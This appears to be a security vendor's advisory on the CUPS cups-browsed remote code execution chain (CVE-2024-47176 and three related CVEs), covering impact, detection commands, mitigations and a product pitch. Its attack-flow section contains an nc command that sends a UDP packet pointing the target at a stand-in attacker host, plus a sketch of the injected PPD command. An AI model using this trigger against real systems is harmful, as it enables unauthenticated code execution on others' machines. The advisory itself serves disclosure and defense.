Critical CVE-2024-47176 October 2024 · 9 min read

CVE-2024-47176: CUPS Linux RCE — 300K Internet-Exposed Systems

A chain of four CUPS vulnerabilities (CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177) enables unauthenticated remote code execution on Linux systems running cups-browsed. Over 300,000 systems were internet-exposed at disclosure. Affects Ubuntu, Debian, Red Hat, Fedora, and most Linux distributions by default.


9.9
CRITICAL
AttributeValue
Primary CVECVE-2024-47176
Related CVEsCVE-2024-47076, -47175, -47177
CVSS VectorAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-20: Improper Input Validation
PublishedSeptember 26, 2024
ExploitationPublic PoC — opportunistic scanning observed

What Is CVE-2024-47176?

CUPS (Common Unix Printing System) is the default printing infrastructure on Linux and macOS. The cups-browsed daemon listens on UDP port 631 for printer announcements on the network. CVE-2024-47176 is the entry point in a four-vulnerability chain: cups-browsed accepts UDP packets from any source, including the internet, without authentication.

By sending a crafted UDP packet to port 631, an attacker can cause the victim's system to connect back to an attacker-controlled "printer." The malicious printer provides a crafted PPD (PostScript Printer Description) file containing embedded commands. When the victim prints anything, those commands execute on their system.

The Full Attack Chain

CVEComponentDescription
CVE-2024-47176cups-browsedBinds to UDP 0.0.0.0:631, accepts packets from any IP
CVE-2024-47076libcupsfiltersIPP attribute values not sanitized when creating PPD files
CVE-2024-47175libppdPPD file generation does not sanitize IPP attributes
CVE-2024-47177cups-filtersFoomaticRIPCommandLine allows arbitrary command execution

Attack Flow

# Step 1: Attacker sends UDP packet to target:631
echo "0 3 http://attacker.com:8631/printers/evil" | nc -u -w1 target.com 631

# Step 2: cups-browsed fetches IPP attributes from attacker's server
# Attacker's server returns malicious printer attributes

# Step 3: libcupsfilters/libppd creates PPD with unsanitized attacker data
# PPD contains: *cupsFilter: "application/vnd.cups-pdf 0 [attacker-cmd]"

# Step 4: Next time any user prints (or admin triggers test print):
# FoomaticRIP executes the command from the PPD
# Command runs as the lp user (often has significant filesystem access)

⚠ No User Interaction After Setup

The attacker only needs to send one UDP packet to establish the malicious printer. Exploitation is then triggered whenever any user on the system attempts to print — including routine print jobs that may happen hours or days later. On servers, an attacker could also trigger exploitation remotely by sending a print job to the newly installed malicious printer.

Scope of Impact

At the time of disclosure, Shodan and Censys scans identified approximately 300,000 internet-exposed systems with UDP port 631 open. The vulnerability affects virtually every major Linux distribution that ships cups-browsed:

macOS is not affected as it uses its own printing stack. However, macOS also uses CUPS internally, so certain configurations may be affected by related issues.

Detection

# Check if cups-browsed is running
systemctl status cups-browsed
ps aux | grep cups-browsed

# Check if UDP 631 is exposed
ss -ulnp | grep 631
netstat -ulnp | grep 631

# Check for unexpected printer additions
lpstat -a
cat /etc/cups/printers.conf | grep -i "deviceuri\|remote"

# Look for suspicious PPD files
find /etc/cups /var/cache/cups -name "*.ppd" -newer /etc/cups/cups-browsed.conf

# Check logs for unexpected IPP connections
grep "cups-browsed" /var/log/cups/error_log | grep "Adding\|New printer"

Mitigation

  1. Stop and disable cups-browsed if not needed:
    sudo systemctl stop cups-browsed
    sudo systemctl disable cups-browsed
  2. Apply patches: cups-browsed 2.0.1 and cups-filters 2.0.1 address the vulnerabilities. Ubuntu, Debian, and Red Hat released patches within days of disclosure.
  3. Block UDP port 631 at firewall: Prevent external packets from reaching cups-browsed
    sudo iptables -A INPUT -p udp --dport 631 -j DROP
    sudo ufw deny 631/udp
  4. Remove FoomaticRIP if not needed: The final RCE step requires foomatic-rip. Removing it (if Foomatic printers are not used) eliminates the code execution capability.
  5. Audit printer configurations: Remove any unrecognized printer entries from /etc/cups/printers.conf

💡 Most Servers Are Not Vulnerable: Server installations of Linux typically do not install cups-browsed by default. The higher risk is in Linux workstations and development machines. However, any Linux system that has been configured for printing should be audited.

KENSAI Detection Capability

How Many Linux Systems in Your Environment Have cups-browsed Exposed?

KENSAI scans your internal and external attack surface for CUPS vulnerabilities across all Linux systems. Get the full picture in minutes.

Find CUPS Exposure →

Related Articles

CISAがパッチ期限を短縮、ホワイトハウスがサイバー戦略を改定 Divergência cibernética EUA-UE se intensifica Redirecting...